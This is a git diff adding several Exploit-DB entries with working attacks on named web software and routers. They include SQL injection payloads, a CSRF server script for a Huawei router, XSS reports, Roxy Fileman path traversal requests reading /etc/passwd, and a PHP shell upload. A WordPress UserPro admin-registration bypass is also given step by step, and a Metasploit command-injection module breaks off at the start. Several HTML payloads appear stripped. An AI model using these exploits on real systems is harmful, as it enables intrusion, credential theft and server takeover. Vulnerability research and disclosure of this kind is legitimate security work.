diff --git a/exploits/cgi/webapps/46081.txt b/exploits/cgi/webapps/46081.txt new file mode 100644 index 000000000..6ae620f74 --- /dev/null +++ b/exploits/cgi/webapps/46081.txt @@ -0,0 +1,20 @@ +# Exploit Title: PLC Wireless Router GPN2.4P21-C-CN -Reflected XSS +# Date: 21/12/2018 +# Exploit Author: Kumar Saurav +# Reference: https://0dayfindings.home.blog/2018/12/26/plc-wireless-router-gpn2-4p21-c-cn-reflected-xss/ +# Vendor: ChinaMobile +# Category: Hardware +# Version: GPN2.4P21-C-CN (Firmware: W2001EN-00) +# Tested on: Multiple +# CVE : CVE-2018-20326 + +#Description: PLC Wireless Router's are vulnerable to a Reflected Cross Site Scripting (XSS).With this attack, the threat actor can steal cookies, session id, username or other sensitive information redirect an innocent victim to a malicious website, thus compromising the user. + +Reproduction Steps: +Step 1: Go to Wi-fi Router Gateway (192.168.59.254 in my case) +Step 2: Login as Username and Password +Step 3: After Login below url will be shown + (http://192.168.59.254/cgi-bin/webprocgetpage=html/index.html&errorpage=html/main.html&var:language=en_us&var:menu=setup&var:page=connected&var:subpage=-) +Step 4: Insert the payload "" at the end of the above mentinoed url and hit enter + (http://192.168.59.254/cgi-bin/webprocgetpage=html/index.html&errorpage=html/main.html&var:language=en_us&var:menu=setup&var:page=connected&var:subpage=-) +Step 5: On execution of the payload, it will be popped up as "XSS-Saurav" \ No newline at end of file diff --git a/exploits/hardware/webapps/46092.py b/exploits/hardware/webapps/46092.py new file mode 100755 index 000000000..b1b5c4531 --- /dev/null +++ b/exploits/hardware/webapps/46092.py @@ -0,0 +1,49 @@ +# Exploit Title: Huawei E5330 Cross-Site Request Forgery (Send SMS) +# Date: 01/07/2019 +# Exploit Author: Nathu Nandwani +# Website: http://nandtech.co/ +# Vendor Homepage: https://consumer.huawei.com/in/mobile-broadband/e5330/ +# Version: 21.210.09.00.158 +# Tested on: Windows 10 x64 +# CVE: CVE-2014-5395 +# Note: The administrator who opens the URL should be authenticated. +import socket +import time + +server_ip = "0.0.0.0" +server_port = 80 + +huawei_ip = "192.168.8.1" +receiving_phone_no = "01234567890" +sms_text = "This is a SPAM text from Huawei E5330" + +sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +sock.bind((server_ip, server_port)) +sock.listen(1) + +print "Currently listening at " + server_ip + ":" + str(server_port) + +client, (client_host, client_port) = sock.accept() + +print "Client connected: " + client_host + ":" + str(client_port) +print "" +print client.recv(1000) + +client.send('HTTP/1.0 200 OK\r\n') +client.send('Content-Type: text/html\r\n') +client.send('\r\n') + +client.send(""" + +
+ + + +""") + +client.close() +sock.close() \ No newline at end of file diff --git a/exploits/php/webapps/46076.txt b/exploits/php/webapps/46076.txt new file mode 100644 index 000000000..56d1d96fb --- /dev/null +++ b/exploits/php/webapps/46076.txt @@ -0,0 +1,36 @@ +# Exploit Title: Embed Video Scripts - Cross-site Script (stored) +# Google Dork: N/A +# Date: 1 Jan 2019 +# Exploit Author: Deyaa Muhammad +# Author EMail: contact [at] deyaa.me +# Author Blog: http://deyaa.me +# POC Video: https://youtu.be/2CFJLwkxpT8 +# Vendor Homepage: https://codeawesome.in/embed/ +# Software Link: https://codecanyon.net/item/embed-video-scripts/20831073 +# Demo Website: https://codeawesome.in/embed/ +# Version: N/A +# Tested on: WIN7_x68/Linux +# CVE : N/A + +# Description: +A stored xss found in "Embed Video Scripts" comments section. + +# POC Request: + +:method: POST +:authority: server +:scheme: https +:path: /embed/comments +content-length: 145 +accept: */* +origin: https://server +x-requested-with: XMLHttpRequest +user-agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 +content-type: application/x-www-form-urlencoded; charset=UTF-8 +accept-encoding: gzip, deflate, br +accept-language: en-US,en;q=0.9 +cookie: __cfduid=de9f1151befbf3ccdb372b7c1afb0a3bb1546252540 +cookie: _tccl_visitor=208f2702-6472-41aa-b129-088a32f1eda6 +cookie: _tccl_visit=208f2702-6472-41aa-b129-088a32f1eda6 + +message=&post_id=1&save=1&avatar=https%3A%2F%2Fserver%2Fembed%2Fassets%2Fimages%2Favatar%2F1.png \ No newline at end of file diff --git a/exploits/php/webapps/46077.txt b/exploits/php/webapps/46077.txt new file mode 100644 index 000000000..ae4b0dcd4 --- /dev/null +++ b/exploits/php/webapps/46077.txt @@ -0,0 +1,20 @@ +# Exploit Title: All in One Video Downloader 1.2 - SQL Injection +# Google Dork: "developed by Niche Office" +# Date: 1 Jan 2019 +# Exploit Author: Deyaa Muhammad +# Author EMail: contact [at] deyaa.me +# Author Blog: http://deyaa.me +# Vendor Homepage: https://nicheoffice.web.tr/ +# Software Link: https://codecanyon.net/item/all-in-one-video-downloader-youtube-and-more/22599418 +# Demo Website: https://aiovideodl.ml/ +# Demo Admin Panel: https://aiovideodl.ml/admin/ +# Demo Admin Credentials: demo@aiovideodl.ml/123456 +# Version: 1.2 +# Tested on: WIN7_x68/cloudflare +# CVE : N/A + +# POC: +https://[PATH]/admin/?view=page-edit&id=2.9'+[SQLI]-- - + +# Exploit: +https://[PATH]/admin/?view=page-edit&id=2.9'+UNION+SELECT+1,2,3,4,concat(user(),0x3a3a,database(),0x3a3a,version())-- - \ No newline at end of file diff --git a/exploits/php/webapps/46079.txt b/exploits/php/webapps/46079.txt new file mode 100644 index 000000000..685e14bbf --- /dev/null +++ b/exploits/php/webapps/46079.txt @@ -0,0 +1,24 @@ +# Exploit Title: LayerBB 1.1.1 - Cross-Site Scripting +# Date: 10/4/2018 +# Author: 0xB9 +# Twitter: @0xB9Sec +# Contact: 0xB9[at]pm.me +# Software Link: https://forum.layerbb.com/downloads.php?view=file&id=26 +# Version: 1.1.1 +# Tested on: Ubuntu 18.04 +# CVE: CVE-2018-17997 + + +1. Description: +LayerBB is a free open-source forum software. The XSS found allows users to add a payload to the title of conversations (PMs). + + +2. Proof of Concept: + +- Start a new conversation sending to any user (victim) you want +- Use a payload in the title +- Next time the user (victim) visits the site payload will execute + + +3. Solution: +Update to 1.1.2 \ No newline at end of file diff --git a/exploits/php/webapps/46080.txt b/exploits/php/webapps/46080.txt new file mode 100644 index 000000000..acd0a6810 --- /dev/null +++ b/exploits/php/webapps/46080.txt @@ -0,0 +1,26 @@ +# Exploit Title: MyBB OUGC Awards Plugin v1.8.3 - Cross-Site Scripting +# Date: 12/31/2018 +# Author: 0xB9 +# Twitter: @0xB9Sec +# Contact: 0xB9[at]pm.me +# Software Link: https://community.mybb.com/mods.php?action=view&pid=396 +# Version: 1.8.3 +# Tested on: Ubuntu 18.04 +# CVE: CVE-2019-3501 + + +1. Description: +OUGC Awards plugin for MyBB forum allows admins and moderators to grant awards to users which displays on profiles/posts. The reason input isn't sanitized on awards page and user profiles. + + +2. Proof of Concept: + +- Have a mod account level or higher +- Go to Manage Awards in ModCP +- Give an award to a user and input payload for reason + +- Payload executes when viewing award on awards.php and user profiles. + + +3. Solution: +Update to 1.8.19 \ No newline at end of file diff --git a/exploits/php/webapps/46082.txt b/exploits/php/webapps/46082.txt new file mode 100644 index 000000000..7b4972b84 --- /dev/null +++ b/exploits/php/webapps/46082.txt @@ -0,0 +1,157 @@ +################################################################################################################################## +# Exploit Title: phpMoAdmin 1.1.5 - MongoDB GUI | Multiple Vulnerabilities +# Date: 03.01.2019 +# Exploit Author: Ozer Goker +# Vendor Homepage: http://www.phpmoadmin.com +# Software Link: http://www.phpmoadmin.com/file/phpmoadmin.zip +# Version: 1.1.5 +################################################################################################################################## + +Introduction + +phpMoAdmin - MongoDB GUI +MongoDB administration tool for PHP + +Vulnerabilities: CSRF | XSS Reflected & Stored + +CSRF details: + +################################################################################# + +CSRF1 + +Create Database + + + + + + + + + +################################################################################# + +CSRF2 + +Drop Database + + + + + + + +################################################################################# + +CSRF3 + +Repair Database + + + + + + + +################################################################################# + +CSRF4 + +Add New Collection + + + + + + + +################################################################################# + +CSRF5 + +Drop Collection + + + + + + + + +################################################################################# + + +XSS details: + +################################################################################# + +XSS1 | Reflected + +URL +http://localhost/phpmoadmin/moadmin.php?db=admin%3Cscript%3Ealert(1)%3C/script%3E + +METHOD +Get + +PARAMETER +db + +PAYLOAD + + +################################################################################# + +XSS2 | Reflected + +URL +http://localhost/phpmoadmin/moadmin.php?db=new.database&newdb=testdb%3Cscript%3Ealert(2)%3C/script%3E + +METHOD +Get + +PARAMETER +newdb + +PAYLOAD + + +################################################################################# + +XSS3 | Stored +URL +http://localhost/phpmoadmin/moadmin.php?collection=%3Cscript%3Ealert%283%29%3C%2Fscript%3E&action=createCollection&db=testdb + +METHOD +Get + +PARAMETER +collection + +PAYLOAD + + + +################################################################################# \ No newline at end of file diff --git a/exploits/php/webapps/46083.txt b/exploits/php/webapps/46083.txt new file mode 100644 index 000000000..9cbc4cae0 --- /dev/null +++ b/exploits/php/webapps/46083.txt @@ -0,0 +1,54 @@ +# Exploit Title: Wordpress Plugin UserPro < 4.9.21 User Registration With Administrator Role +# Google Dork: inurl:/wp-content/plugins/userpro/ +# Date: 3rd January, 2019 +# Exploit Author: Noman Riffat +# Vendor Homepage: https://userproplugin.com/ +# Software Link: https://codecanyon.net/item/userpro-user-profiles-with-social-login/5958681 +# Version: < 4.9.21 +# Tested on: Wordpress 4.9.9 with linux but should work on all WP versions and OS as well + +UserPro fixed a user registration with administrator privileges vulnerability in version 4.9.21 +But there wasn't any POC available so this exploit demonstrates this +vulnerability. +https://demo.userproplugin.com/wp-content/plugins/userpro/changelog.txt +From the changelog: "Security Fix : Registration role validation fix" + +The latest version up to now is 4.9.29 +The vulnerability allows anyone to register with Administrator role which +can easily be turned into RCE + +Steps to reproduce: + +1. Go to the registration form, input random fake values, trigger Burp +Suite and click submit. + +2. The POST data will look similar to following + +redirect_uri-701=&_myuserpro_nonce=xxxxxx&_wp_http_referer=%2F&unique_id=701&user_login-701=USERNAME&user_email-701= +USERNAME@EMAIL.COM +&user_pass-701=PASSWORD&user_pass_confirm-701=PASSWORD&display_name-701=&profilepicture-701=&country-701=&facebook-701=&twitter-701=&google_plus-701=&user_url-701=&terms=on&action=userpro_process_form&template=register&group=default&shortcode=xxxxxxxxxxxxxxxxxxxxxxxxxxx + +Here "-701" is a random postfix number and gets stripped at the server. +Other than that, the interesting values are + +user_login +user_email +user_pass +user_pass_confirm + +3. Adding following extra parameter in POST data will register the user +with Administrator privileges + +role-701=administrator + +So the modified POST data will look similar to following + +role-701=administrator&redirect_uri-701=&_myuserpro_nonce=xxxxxx&....snip....snip.... + +4. Forward the POST data in Burp Suite and you will get redirect to +/profile/ page with Administrator menu on top. Access /wp-admin/ to get to +the dashboard + +5. Upload shell with default methods + +@nomanriffat \ No newline at end of file diff --git a/exploits/php/webapps/46084.txt b/exploits/php/webapps/46084.txt new file mode 100644 index 000000000..48c6eff50 --- /dev/null +++ b/exploits/php/webapps/46084.txt @@ -0,0 +1,34 @@ +# Exploit Title: MyT-PM 1.5.1 - 'Charge[group_total]' SQL Injection +# Date: 03.01.2019 +# Exploit Author: Mehmet Önder Key +# Vendor Homepage: https://manageyourteam.net/ +# Software Link: https://sourceforge.net/projects/myt/ +# Version: v1.5.1 +# Category: Webapps +# Tested on: WAMPP @Win +# Software description: +MyT (Manage Your Team) - is a free open source task management and project +management system, based on Yii Framework, easy to use and with a great +perspective of growth for the future. + +# Vulnerabilities: +# An attacker can access all data following an un/authorized user login +using the parameter. + +# POC - SQL Injection : + +# Parameter: Charge[group_total](POST) +# Request URL: /charge/admin + +# Type : Error Based +# Payload: Charge[user_name]=k&Charge[group_total]=1) AND +EXTRACTVALUE(2003,CONCAT(0x5c,0x7171716b71,(SELECT +(ELT(2003=2003,1))),0x7170707071))-- eaYu&Charge_page=1&ajax=charge-grid + +# Type : Time-Based Blind +# Payload: Charge[user_name]=k&Charge[group_total]=1) AND (SELECT * FROM +(SELECT(SLEEP(5)))ggBK)-- mGKC&Charge_page=1&ajax=charge-grid + +# Type : Stacked Queries +# Payload: Charge[user_name]=k&Charge[group_total]=1);SELECT +SLEEP(5)#&Charge_page=1&ajax=charge-grid \ No newline at end of file diff --git a/exploits/php/webapps/46085.txt b/exploits/php/webapps/46085.txt new file mode 100644 index 000000000..e061172d7 --- /dev/null +++ b/exploits/php/webapps/46085.txt @@ -0,0 +1,177 @@ +====================================================================== +Exploit Title:: Multiple Vulnerabilities +Software: Roxy Fileman +Version: 1.4.5 +Vendor Homepage: http://www.roxyfileman.com/ +Software Link: http://www.roxyfileman.com/download.php?f=1.4.5-php +CVE number: CVE-2018-20525, CVE-2018-20526 +Found: 2018-12-07 +Tested on: PHP 7.0, Ubuntu 16.04 LTS +Author: Pongtorn Angsuchotmetee, Vittawat Masaree +SnoopBees Lab +https://www.snoopbees.com +======================================================================= +Description +=============================================================== +Roxy Fileman is free open source file browser for .NET and PHP, ready for +use with CKEditor and TinyMCE WYSIWYG html editors. It could be easily +integrated into a CMS or any other web application. Fileman is based on +JQuery and JQueryUI libraries and it's compatible with all modern browsers +- Internet Explorer, Firefox, Google Chrome, Safary and Opera. + +Roxy Fileman is designed to be as flexible as possible. The client +interface is completely separated from the server-side logic and scripts, +thus can be used with any server programming language - PHP, ASP .NET, +Python, Cold Fusion etc. All data exchanged including configuration and +language files is in light weight JSON format. Great performance - all data +from the server is loaded using Ajax without page reloading. Fileman has +ready to use distributions for PHP and .NET. All client-server +communications and configuration files are in JSON format and are language +independent. See custom server side scripts. +Ref: http://www.roxyfileman.com/ + +Vulnerability +================================== + + 1. Path Traversal (CVE-2018-20525) + 2. Unrestricted File Upload (CVE-2018-20526) + +================================== + +Proof of Concept +=========================== +1) Path Traversal (CVE-2018-20525) +================================== +The vulnerability affected file “copydir.php", “copyfile.php", +“fileslist.php". It is we can manipulating variables that reference files +with “dot-dot-slash (../)” to access arbitrary files and directories +access on file system. After copied the system file will appear on Roxy +file manager “http://[IP-Address]/fileman/Uploads". + +################################################# +---------------------------------------------------------------------------------- + +1.1. copydir.php + +POST /fileman/php/copydir.php HTTP/1.1 +Host: 10.10.10.190 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) +Gecko/20100101 Firefox/64.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://10.10.10.190/fileman/index.html +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 78 +Connection: close +Cookie: PHPSESSID=m48hnq7i6f83tdb38kaagfn4af; +roxyld=%2Ffileman%2FUploads%2FImages; roxyview=list + +d=%2Ffileman%2FUploads%2F*/../../../../../../../../etc/*&n=%2Ffileman%2FUploads/ + + +---------------------------------------------------------------------------------- + + +1.2. copyfile.php + +POST /fileman/php/copyfile.php HTTP/1.1 +Host: 10.10.10.190 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) +Gecko/20100101 Firefox/64.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://10.10.10.190/fileman/index.html +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 66 +Connection: close +Cookie: PHPSESSID=m48hnq7i6f83tdb38kaagfn4af; +roxyld=%2Ffileman%2FUploads%2FImages; roxyview=list + +f=%2Ffileman%2FUploads%2F*/../../../../../../../../etc/passwd*&type= +---------------------------------------------------------------------------------- + + +1.3. filelist.php + +POST /fileman/php/fileslist.php HTTP/1.1 +Host: 10.10.10.190 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) +Gecko/20100101 Firefox/64.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://10.10.10.190/fileman/index.html +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 65 +Connection: close +Cookie: PHPSESSID=m48hnq7i6f83tdb38kaagfn4af; +roxyld=%2Ffileman%2FUploads%2FImages; roxyview=list + +d=%2Ffileman%2FUploads%2FImages*/../../../../../../../../etc*&type= + +############################################################## +============================ +2) Unrestricted File Upload (CVE-2018-20526) +================================== +The vulnerability affected file upload.php and in the condition that the +php.ini file need have add the “*AddHandler php7-script .php*”. And now we +can upload the shell code file to the server by double extension such +as *shellcode.php.png +* + +-------------------------------------------------------------------------------------------------------------------- + +POST /fileman/php/upload.php HTTP/1.1 +Host: 10.10.10.190 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) +Gecko/20100101 Firefox/64.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://10.10.10.190/fileman/index.html +Content-Type: multipart/form-data; +boundary=---------------------------67141620012509 +Content-Length: 547 +Connection: close +Cookie: PHPSESSID=m48hnq7i6f83tdb38kaagfn4af; roxyld=%2Ffileman%2FUploads; +roxyview=list + +-----------------------------67141620012509 +Content-Disposition: form-data; name="action" + +upload +-----------------------------67141620012509 +Content-Disposition: form-data; name="method" + +ajax +-----------------------------67141620012509 +Content-Disposition: form-data; name="d" + +/fileman/Uploads +-----------------------------67141620012509 +Content-Disposition: form-data; name="files[]"; filename="*phpshell.php.png*" + +Content-Type: image/png + +* * +-----------------------------67141620012509-- + +------------------------------------------------------------------------------------------------------------------------------------------- + + +Timeline +================================== +2018-12-07: Discovered the bug +2018-12-11: Reported to vendor (The vendor is unresponsive) +2018-12-19: Reported to vendor (The vendor is unresponsive) +2018-12-27: Request CVE +2019-01-03: Advisory published + +Discovered By: +===================== +Pongtorn Angsuchotmetee, Vittawat Masaree \ No newline at end of file diff --git a/exploits/python/remote/46075.rb b/exploits/python/remote/46075.rb new file mode 100755 index 000000000..e36153226 --- /dev/null +++ b/exploits/python/remote/46075.rb @@ -0,0 +1,144 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => "Mailcleaner Remote Code Execution", + 'Description' => %q{ + This module exploits the command injection vulnerability of MailCleaner Community Edition product. An authenticated user can execute an + operating system command under the context of the web server user which is root. + + /admin/managetracing/search/search endpoint takes several user inputs and then pass them to the internal service which is responsible for executing + operating system command. One of the user input is being passed to the service without proper validation. That cause a command injection vulnerability. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Mehmet Ince